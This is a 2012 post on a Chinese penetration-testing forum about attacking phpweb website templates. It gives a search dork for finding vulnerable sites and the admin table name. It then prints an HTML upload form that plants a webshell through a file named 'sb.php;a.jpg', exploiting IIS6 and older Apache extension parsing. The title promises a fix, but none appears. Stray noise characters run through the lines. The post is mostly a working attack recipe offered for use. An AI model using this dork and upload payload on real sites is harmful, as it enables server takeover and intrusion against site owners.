中国网络渗透测试联盟

标题: phpweb成品网站全版本通杀注入漏洞及修复 [打印本页]

作者: admin    时间: 2012-11-9 20:52
标题: phpweb成品网站全版本通杀注入漏洞及修复
关键字:inurl:webmall/detail.php?id
% _9 Y! m+ X: K2 m0 d" z: `4 r+ K/ g# j
数据表:pwn_base_admin
$ f9 _/ m2 _$ O" n4 }% ]' D 5 z* }% X' v+ v8 ]
关于拿shell% w# D; l; A5 j! ?' V

! `! _! z+ A* O6 T1 \; K. X- k首先登录后台admin.php
) M# @# \6 g/ s% V) x- s: O. B; A9 e 2 H2 I9 M: V% y4 G; E
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。! S6 o' z+ d& [0 s/ o
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
# m/ q! P& {) z% u然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
, O3 ~) w2 h) y  a& V) E<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
4 H% I, j8 N/ I7 |<input type="text" name="fileName" value="sb.php;a.jpg" /> " N0 b3 _- N( d, T% H& s2 `( d
<input type="hidden" name="attachPath" value="news/pics/" />
1 h+ V) q: h3 a<input type="file" name="fileData" size="14" /></td> 3 M8 N4 d* h5 M4 v
<input type="submit" name="button" value="确定" />
" z1 H) z2 y$ T1 Y6 w; t% K</form>9 B3 M3 E% ^- h3 l7 e2 d9 `

5 j: i/ O6 a: [$ x首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。9 b5 o! u: P6 V

1 z: x) E: t. K. s




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2